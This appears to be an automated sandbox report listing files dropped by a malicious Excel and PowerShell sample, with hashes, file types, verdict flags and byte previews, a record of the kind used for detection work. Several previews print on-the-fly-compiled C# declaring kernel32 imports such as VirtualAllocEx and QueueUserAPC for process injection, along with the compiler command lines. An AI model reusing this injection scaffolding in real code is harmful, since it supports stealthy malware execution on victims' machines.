SHA-256:	3F29C2D219DC17B25B6BB29624E7061608E30D303FA3658B01F6AB96DA89FA03
SHA-512:	DA2190782A7CE65CD54FBE181FBF34A4A8146111780F2F519F7E15A9FA874D93D494FEDCDCFC2579C0A3D5F476923CE5DABF3547F467419444CBEA9432B45FD6
Malicious:	false
Preview:	.PNG........IHDR...................WPLTE...z..z........2........W..{..V........z.....2..3.....V..2..................W.....>`......tRNS.............................Y..j....IDATx....BcI.@A.s..HX....k.0c...T.?n./.~....b....GM.Gu.c...?.{5.5...4.'.o<...i.O.n<.f..?).g.&..8.E4..tl.4.G.o4.....'.....\......._ ...../.~..<......../.~^.}...?...~...Z../.~.]._ ...I. .Q.Y....YQu..i..4.._ \|S...A.-.-h...9...o...k.....9o..?N.U,../+...Z.y...nbMu....4O.7>..Y.-L=J..q..`.B^{4~.p...bR.j.....Gq=..]&..7Y)G6.....A.h`i]...Pd.'.7....9.2...2x.........&..a0N..By.Y.C..S......nR.-..A[5.....\|.p...+v...d\e..]Yq;.&q0..F.c.....p3.&.`..!q..}...k.g5n#........NG-.9...C..[.7.n.v..u......{o.C&n!.(.G7.JA.'6..{(<....p....:..!=..1.f.."..n.8....~o..N.3l..p.[..........r..6..z...(.g1qA.[....q.v+..&...B{.I.\..-.....S.y&.......J.Wn!\|D.....+...y.....9.......> .j......{.....K\X.n!..e.I.+'...j...-pA.[..2...8g.DO.#.?p.. ....-.w5.d......4....n..!q..=..Gu.X..O.........sN.h.q..n!..qP

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\urlblockindex[1].bin Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	16
Entropy (8bit):	1.6216407621868583
Encrypted:	false
MD5:	FA518E3DFAE8CA3A0E495460FD60C791
SHA1:	E4F30E49120657D37267C0162FD4A08934800C69
SHA-256:	775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7
SHA-512:	D21667F3FB081D39B579178E74E9BB1B6E9A97F2659029C165729A58F1787DC0ADADD980CD026C7A601D416665A81AC13A69E49A6A2FE2FDD0967938AA645C07
Malicious:	false
Preview:	.p.J2...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97AC40E5.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Size (bytes):	2396
Entropy (8bit):	2.8933499259079904
Encrypted:	false
MD5:	DC917AC385A596A80C881C80452BDCE4
SHA1:	3E880B325CE701F8F82EBB8B1BF01FC7461DF412
SHA-256:	685F0EEB9624A4B2E09B5DBF4AB61B60E4B96589F8386769739768927893FAE9
SHA-512:	44114863E772D9EE1607F18551A55941FBC9D1D13E31B3C7BD4BA3F88DD4A7C5D8961921CF1CB803FDC808E094CE4CFE1DD0487599A9F0BEF74E6856C9442A52
Malicious:	false
Preview:	....l................................... EMF....\...(.......................N...1.......................]j..F...,... ...GDIC........j.(..............................................................................-.........!.............................-...................................-.........!.........................$.............................-.......................................$.............................-...............-.........!...............-...........................Calibri.....0......p...............-...........................2.................Notifica......................."System........1.....................-.......'.....................................................................................!.......'.......................%...........L...d...................................!..............?...........?................................'.......................%...........................................................%...........L...d...............

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ABF789A2.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 426 x 305, 8-bit colormap, non-interlaced
Size (bytes):	4448
Entropy (8bit):	7.881769156163968
Encrypted:	false
MD5:	B21088FCA74BDF01852DC73963FDB833
SHA1:	2AC234B6A8A4ED623ABDEF9E61F749205C22213D
SHA-256:	FF0872DFF74913AC67021876E79E8A6A375FBE1AEA5C3EEB434EA06A6A9E07C1
SHA-512:	6BFE3C4CE91AC830E0988DDD34E37DB0ABB6AF170B713C29E810438862F24A65EEA5F67B47EF4BD982CF68EE38DA6DB081CA674CE41E1A5C4ED95BF3EA878AD0
Malicious:	false
Preview:	.PNG........IHDR.......1........D....tEXtSoftware.Adobe ImageReadyq.e<...QPLTE.............^..........f..0........c.f..0.........c.f..ffC..C..C.cff.fff000......R....IDATx..].b.:.....N...{...?..=a..J.....p.,Yf...@ .....@ ......N.../x..@%.....@.....u.Z........B.O;T...W....?...k....CU:?(U.P..l...m.{.....__jv.....K...}.....R..............1L......m.W....X:?..Jq.?.)..{.g.....{MG..Vq...e..6.T....].P.....Q3u\|{...q..{.NW..O1~.ba.........?V.z.}..fY...3X.Y^..JZ(..%..%...\8..v....q.=...e5.?V...B..RU.?...].S..b..O....v..E..HD..Z.o.n...0.U.......`.!.O..;....Vf...w.U....xT.S%/.U.].gL...RU,?...m-..[.m.v..-e..^.O_...)...C...K6.=..a.k...OWm...]U8?}...k.t._t...T..O.m.,.6.......t~.A.......y.&..\|~...H..H/U....\|...w.}....Z..E...!...~......e....N.k...e&7.o......#.....3.p.}..Efn.H...d.}..f^.l.y.b....}......JU.Gpr..?=.5....o..".?.6~.....Dm....Mm..T.n..{4.....{<.m_.V%N....................Y TV/9.h.d....L.-...&Z......%C.4...:..bTCu)PE..B.v...k..j.f4"..H...XUQ....y.o....4..

C:\Users\user\AppData\Local\Temp\CSC7436.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	MSVC .res
Size (bytes):	652
Entropy (8bit):	3.0880494355531827
Encrypted:	false
MD5:	302A1804AE4F978F5494072EC97342EE
SHA1:	BE9D95AA2C3E03F507258A7DD78CA66F0F25480F
SHA-256:	7FC03035E149001B6568CB8F33C8DD9B2AFD763D3876B0403B2F9870D203FB11
SHA-512:	3879C91E03D287BBDA054F48AF9FAA3F529C243F2373898D404DF100BE62E0B8C5F91FC2FEC9989B3B36CE1BF3565E06122DE08150A4230C7671FF9EE1BA9F62
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.g.d.s.o.n.v.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.g.d.s.o.n.v.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSC9006.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	MSVC .res
Size (bytes):	652
Entropy (8bit):	3.113166336265381
Encrypted:	false
MD5:	2FE8786AE15EE90E7F5A031BFFBEB07C
SHA1:	9A2C7F4CBB1BA34DA3E50EDF320DA7739CF4C0E2
SHA-256:	95CC6F61084C225CB6F871A7D385C3E53335B4F429135774756386D9482DE56F
SHA-512:	8DC8C8A21524FB695455612CD4767CCD4DCC447F6052C87E29B672EAF6C6A680EC3A2E7796CB55EC227DC67D9E1A968EB0C761EA005CD973442F41D0A6E58171
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.0.k.g.x.d.q.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.0.k.g.x.d.q.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Size (bytes):	241332
Entropy (8bit):	4.290754950046083
Encrypted:	false
MD5:	8B1B6FEC1D37B1D123BF39AE9C16B676
SHA1:	02810CB607C30DC961372ADE198C4A733C783B1F
SHA-256:	7D9DB1528E5D4F383A2B797462A6F17B06352B620327166C3B08C031C4799023
SHA-512:	8C6FA7B2408D6AD6338353B1AB3BF084E492ED0D653329FFC5887AD754CC604F82C4A080870E468E1A9A117EE008FFA3B4CE36827A46AF0A0CCD3A1F5B9DC70F
Malicious:	false
Preview:	MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......l...8..........................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!............................................................................................B.

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	89
Entropy (8bit):	4.5491909813049425
Encrypted:	false
MD5:	5447732CF53378EA974EFFEC2BAF0120
SHA1:	6C464D5AA478938B046B0224520AFBD2595E64C2
SHA-256:	F8138A7216B4D72425F137E60D281C114AA4EC6723B5F608D9181FD15086BFA6
SHA-512:	2A08621F1B4D7F8B5AD68B3F4BD3B3A1CF52033250298E90A8CB66157EADFED4FF7BEBF0343F61BE2936119FCDE5EC72A830B27F494C72CD0E9DA355292854BD
Malicious:	false
Preview:	[2019/12/09 17:32:28.594] Latest deploy version: ..[2019/12/09 17:32:28.594] 11.144.2 ..

C:\Users\user\AppData\Local\Temp\RES74FF.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type:	data
Size (bytes):	2064
Entropy (8bit):	2.4159863863040765
Encrypted:	false
MD5:	732C8F9F60E78F523B012970052DF069
SHA1:	98381C92CF2AE2CA48508E9ED308E8529EED7B65
SHA-256:	1DA0500B812DF7D9BD31845455CCD6395095CF0512180FDB3F864EA27AAB6F14
SHA-512:	F8914C4866415CA8180BBC04205BFB11F003FCAE845202D11BAED0C4CA7E88873D5DE22F784BFF1C413C89AC336D93D3BE347571BEBD3F012FA0BC9169606F4B
Malicious:	false
Preview:	........8....c:\Users\user\AppData\Local\Temp\CSC7436.tmp...............0*...O..T....sB.......f...7.......C:\Users\user~1\AppData\Local\Temp\RES74FF.tmp.+...................'.Microsoft (R) CVTRES.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES9007.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type:	data
Size (bytes):	2064
Entropy (8bit):	2.4270210968998907
Encrypted:	false
MD5:	BFF455BE051BFA8E025F5C5D22ADAD61
SHA1:	23D6808F6292F606F2053F551566148366F67527
SHA-256:	74D69CDB073E8B8ED374BF7D9C6676630C4492B7A1DB916F681BE59FCAF2D672
SHA-512:	4A450A298F835B6BB8D333175F1ABD3E217316CC79986B4A4DBA402D0EB46FBDE97BD5006A1448A1FC0E215BB88CBD0B2A4DAAAF86B4EB19BB87D68B2BA6226E
Malicious:	false
Preview:	........8....c:\Users\user\AppData\Local\Temp\CSC9006.tmp.............../.xj.^...Z.....\|......f...7.......C:\Users\user~1\AppData\Local\Temp\RES9007.tmp.+...................'.Microsoft (R) CVTRES.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\W Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	176128
Entropy (8bit):	5.76963131649237
Encrypted:	false
MD5:	A5CEC3346A2BABC4DCD8A352DB801AB6
SHA1:	5DE4A53D62081ECD89D406026E26C2DA39C3F3D1
SHA-256:	DD22AB3B2BAAF814EF2579FCF632510C00C823967CEBC8F6905187E13597266B
SHA-512:	456A21170D16419201BB82A350C304B8406568DF37D5C9BE102995E61B5A1F7411DBFC4F36839BA794A9DE8DAA37F4AF06745A935AB424DDD3A01B33E42215FD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3.N.].N.].N.].i. .\.].i.3.W.].i.0...]....G.].N.\.*.].i./.O.].i.!.O.].i.%.O.].RichN.].........................PE..L...9..]...........!................%.............@.........................................................................L...d.... ..h....................0..........................................................`............................text...t........................... ..`.rdata..............................@..@.data...\|........0..................@....rsrc...h.... .......@..............@..@.reloc..8^...0...`...P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\v0kgxdqm.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Size (bytes):	404
Entropy (8bit):	4.977110212513821
Encrypted:	false
MD5:	491B7E842CBD76E67FC46D1BA98FEF00
SHA1:	161963C4DF99CD7DC23CBC5FA0DE966AFB985B0F
SHA-256:	E126EDA0F04273D91FA83962EBD3000773F7E246CED3DB84A6155034568235F9
SHA-512:	882E7CAAA26E5D24407BDE2D165D25E27FA5A1E92EFC60CBE463991BB1189FB8DE6AE905BB14AD08E87B32C51AF7FE59AAF4B5E40D32E621D548CB72E8A7CC60
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ooqlr. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint wpen,uint vnpxfsh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr qjgptv,IntPtr tgaa,uint tlkqcyucxsu,uint diqm,uint ibphr);.. }..}.

C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Size (bytes):	327
Entropy (8bit):	5.359010783648616
Encrypted:	false
MD5:	1CC9F67F38551DE0D2971D196563843E
SHA1:	1C2679639C3E019699590D7045F9E244D307C45A
SHA-256:	DA4E354D5826A045816C97D7A6046A310B383166350EE47E6E9A49C87D2372E0
SHA-512:	3688190BA4F4EE1A4B88E83C6CCF8E66B5244A20130C6211E012A4C134CC6901C8A63CA39CDB28A41DEE58BF3EBEE468CAC7A0519EC59F61E1A8D67C36A9277F
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:"C:\Users\user\AppData\Local\Temp\v0kgxdqm.dll" /D:DEBUG /debug+ /optimize- /warnaserror "C:\Users\user\AppData\Local\Temp\v0kgxdqm.0.cs"

C:\Users\user\AppData\Local\Temp\v0kgxdqm.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):	3584
Entropy (8bit):	2.9798685746527074
Encrypted:	false
MD5:	6E06960BEF98A2EDBBCEFD78773D0875
SHA1:	7959FE29D77EFCD0EDABFFD27B99A4E6E5BD64B4
SHA-256:	809DC4BBB647804147DA7EAD2B5FD84938756D90A4F2D456BB7418B8890FF3C1
SHA-512:	D43BA20C98480105C5CC220D865D0B3704B76F4F8DD141F4CE59C4D837C4D637777A35B0023050D57344634A3DC531F89653492AEA70F8ADB26DA5169844A919
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$w.]...........!.................$... ...@....@.. ....................................@..................................$..W....@.......................`.......$............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v2.0.50727......l...h...#~......p...#Strings....D.......#US.L.......#GUID...\...d...#Blob...........G..........3............................................................1....z.g.....................#...................................... 8............ J............ R.....P ......a.........?.....D.....L.....S.....X.....d.....i...a.!.!.a.'.).a...1.a.,...a.......1.....:.....C.6.....8.......J.......R.......................................!..........<Module>.v0

C:\Users\user\AppData\Local\Temp\v0kgxdqm.out Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	198
Entropy (8bit):	4.894444435447011
Encrypted:	false
MD5:	182738883BFDFB548627BEC18305C7EE
SHA1:	FD5A8D41B96844985C0DC21116CFA689CED8AABE
SHA-256:	5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622
SHA-512:	9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D73628FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0
Malicious:	false
Preview:	Microsoft (R) Visual C# 2005 Compiler version 8.00.50727.5483..for Microsoft (R) Windows (R) 2005 Framework version 2.0.50727..Copyright (C) Microsoft Corporation 2001-2005. All rights reserved.....

C:\Users\user\AppData\Local\Temp\v0kgxdqm.pdb Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	data
Size (bytes):	13356
Entropy (8bit):	0.9345362579599333
Encrypted:	false
MD5:	C1EDE1A32BE06BDBA095F3B2FC3B655F
SHA1:	723A95E133A6C620C49B88EC5205352F51FE2045
SHA-256:	27F046A39D984DBBAD0B23412ACE2B0120B51D7F940A9A4A03F9CB1A05D42316
SHA-512:	DB911B490E6550EA81F6815532556E877A0E60F5FBC3421B5A4F1A3F62862612BD184F0501E1738860C990C8FF7C2F7E0E29EC2B2F7B08C494232AB669F9BC6D
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ygdsonvv.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Size (bytes):	408
Entropy (8bit):	5.051049819996584
Encrypted:	false
MD5:	5E15D82526B18E08595827982732861A
SHA1:	2373752B11D4DB23660299F22131FD0F7C895425
SHA-256:	08CB73DF4A5E5BF76FA4E99CE467330B394756ED8C6CE3FB7A37D20D3552F910
SHA-512:	2E15FEF90ABB2F749D46932724C977E8FBBCD154CCA416A6F04405023393C7AD7501DB1E6F847A86BCF57521B671C2EFC292F1B05BB8D3EF4FFCC30B3DC2A5B0
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mvcsgfjqgq. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr kowreos,IntPtr ado,IntPtr sfuk);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ljbdinbq,uint dmdgjmkma,IntPtr vvinmlodu);.. }..}.

C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Size (bytes):	327
Entropy (8bit):	5.308198071307418
Encrypted:	false
MD5:	3FEA9B5A277EEC4AD454A49BC603A4C1
SHA1:	0F3314C5606F10CCEEE72FDF906D042DCE5953D8
SHA-256:	7C493DC37A91F3A8686CC86614878CD9779020554EB1515EF886D386D6729AB5
SHA-512:	6EC12A401A3D7A317487D04F9D6218652FEE7BCDE93DDB69680C54C29471F246D19DEA554FCBAA125EF202387C6E364C039D76AAB764F0AC8BB15E79250E91B0
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:"C:\Users\user\AppData\Local\Temp\ygdsonvv.dll" /D:DEBUG /debug+ /optimize- /warnaserror "C:\Users\user\AppData\Local\Temp\ygdsonvv.0.cs"

C:\Users\user\AppData\Local\Temp\ygdsonvv.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):	3584
Entropy (8bit):	2.990487394918915
Encrypted:	false
MD5:	068539A8BEA0739B58D5EBE0D40AC966
SHA1:	DD5250D7467CC6089F9C3B00DEB960F78531072C
SHA-256:	661ADE6060854613D0A79AE0453A8311A0F035A2283E888C57DEB381CDFCE9FC
SHA-512:	CA4B0E11A4A8E2B20359743360B369C1DF0079625B48F79BFF6311FC9D529DE09DECE53F52AF2305AC30C283A6C94A462635132ECE768EFB63232CAAA663DA6C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w.]...........!.................$... ...@....@.. ....................................@..................................$..K....@.......................`.......$............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v2.0.50727......l...`...#~......t...#Strings....@.......#US.H.......#GUID...X...d...#Blob...........G..........3............................................................6./.....n............................................".............. =............ J............ ].....P ......h.........F.....N.....R.....W.....`.....j...h. .!.h.&.).h...1.h.+...h.......0.....9.....B.=.....=.......J.......].......................................&........<Module>.ygdsonvv.d

C:\Users\user\AppData\Local\Temp\ygdsonvv.out Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	198
Entropy (8bit):	4.894444435447011
Encrypted:	false
MD5:	182738883BFDFB548627BEC18305C7EE
SHA1:	FD5A8D41B96844985C0DC21116CFA689CED8AABE
SHA-256:	5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622
SHA-512:	9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D73628FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0
Malicious:	false
Preview:	Microsoft (R) Visual C# 2005 Compiler version 8.00.50727.5483..for Microsoft (R) Windows (R) 2005 Framework version 2.0.50727..Copyright (C) Microsoft Corporation 2001-2005. All rights reserved.....

C:\Users\user\AppData\Local\Temp\ygdsonvv.pdb Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	data
Size (bytes):	13356
Entropy (8bit):	0.9350903351907982
Encrypted:	false
MD5:	A584F72E9A578FE0A8EB80AFF8AF9754
SHA1:	27A7F56578D6CEDA4435A069D7D98436B7675801
SHA-256:	0BD376BAEAB7DFB830739D393DB052BC19356290FFBCF5DE4131410AD216F3A0
SHA-512:	66B6830A81889CF02AA560F77B0B040EE9A83B7C988A1972EA97C1A0BD2610A4986CCE287D667317159757F4A5E07D1B3D093B52AC681999C57812DF03A76FDD
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF00A1094E21FFE937.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	39417
Entropy (8bit):	1.5223950586828556
Encrypted:	false
MD5:	E8987FDDBDD166BA2F9AC024DBB54A6C
SHA1:	718E63628C3110DD4067FC62F357303D8E28973A
SHA-256:	ED3867067D64025B26C70838BD82CC105C9383FAE98ECC35B1E9F8BD78C10819
SHA-512:	40D1A8B1AC96C5EE6F36334790AC5B780AD0CEB315F6E7C921927920BB3EFDE9FE84684D7DABC57B1C2669593364F1FB2DBFB43E175E196EC2D1AF58898731D9
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... .......................................0C07..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF26328438DCE709C5.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	39449
Entropy (8bit):	1.3444074477642733
Encrypted:	false
MD5:	C335E1D0B9D13D6B54E21A7069B2EC38
SHA1:	38139A678C865E7C06AB375BF0D0628D13F35B66
SHA-256:	23E15136D234D0CB7EB1A5FD2311A64515A9373396364261DCDD3A666C8B3AC4
SHA-512:	1513BE8BFB404ADEAD79C3EE52221E21B9AF77F10D85CD8C56F56CA2613D84769CB18B2A0BF312A75E8402F8DDAF536BDEB3117B580EC31F1D86D50BCC319151
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... .........................................t?..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF423E474A1C6DC840.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	39433
Entropy (8bit):	2.3301952925068696
Encrypted:	false
MD5:	DABE7D3DDB9200033DA37EF0BC9F0E45
SHA1:	437CFB9E1F2C6446A3045D360338B2323CDB2934
SHA-256:	7670E106824F7A8E818241D3EA9264D8E59F3316BD4AF5AD64F767DA3A741064
SHA-512:	42E42FFDE77B3CB7EAF5060536FCFB8364B9696791F63EBE6F20CCA08D855DBBAF820415FE05C03FBF48F606997B0138C08BA98E0E46F3105D90A5798B4FBB02
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... .........................................#...................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF57A74C65F84816A7.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	12933
Entropy (8bit):	1.5696954609413685
Encrypted:	false
MD5:	C3FFFA2BBFD127A27FEF31CD10FB29AD
SHA1:	9BE9C429A55DCC7DE51945446C50D51BA48A8824
SHA-256:	7EE4BADC41D84388D6D819C103E3E25C161ECA9FE02954A476E7594BA5FD42E3
SHA-512:	65B77CC22A268D2DF4898316A66CA6CB91734E7F25659F4E3417E2018269F3728C63ACBA730EFD0B0A5E6F36ECAA0E632AE231DC33A982A9F0A090B6D6FD92D8
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6DDC0C8057C653B9.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	12933
Entropy (8bit):	3.558482583901816
Encrypted:	false
MD5:	52B611F12C290232DEC944CABAEC91E6
SHA1:	8BF9B0388620BBD9F2CC321A2CDE60B6E08271AD
SHA-256:	313C6ACF0D272296C392B003D3FD94126E16C61C54775AC9F00D3E8456205B44
SHA-512:	04AA748287812C02CE1654EA0A84506D7B971CAC86574D811D28E56544C6EB62453FACF38EC53D4EFA59E978B250E18A7D55E62C90C4F7803B93A7114EB59B64
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ................................... bW.p!Tj.............................fW.p!Tj.............................gW.p!Tj.............................hW.p!Tj.............................ZW...Tj............................h^W...Tj............................ bW...Tj.............................fW...Tj.............................gW...Tj.............................hW...Tj.............................ZW...Tj............................h^W...Tj............................ bW...Tj.............................fW...Tj.............................gW...Tj.............................hW...Tj............................ bW..Tj.............................aW..Tj.............................aW..Tj.............................aW..Tj.............................aW..Tj.............................aW..Tj............................(ZW..Tj.......

C:\Users\user\AppData\Local\Temp\~DF881119748BF62D6C.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	39609
Entropy (8bit):	2.191030639858403
Encrypted:	false
MD5:	5CE54C7A672060D57F8AB6AE8E14513D
SHA1:	CDFA92DE4D8EF774361773E60F031F980984559F
SHA-256:	F6E54A6AD2838F4264BC46943FA042701F1267A6FDEEF23C3BC15A7356F7B13D
SHA-512:	A6573A0B8F6F4B63B3D0CEDB1958CB983AB57CE272075BC09D85309DC72A3198A58099B4642B38BAEE9E093DB96D9421814174E9B0793592F9273F255E1BA356
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB451A12262FF19FB.TMP Download File
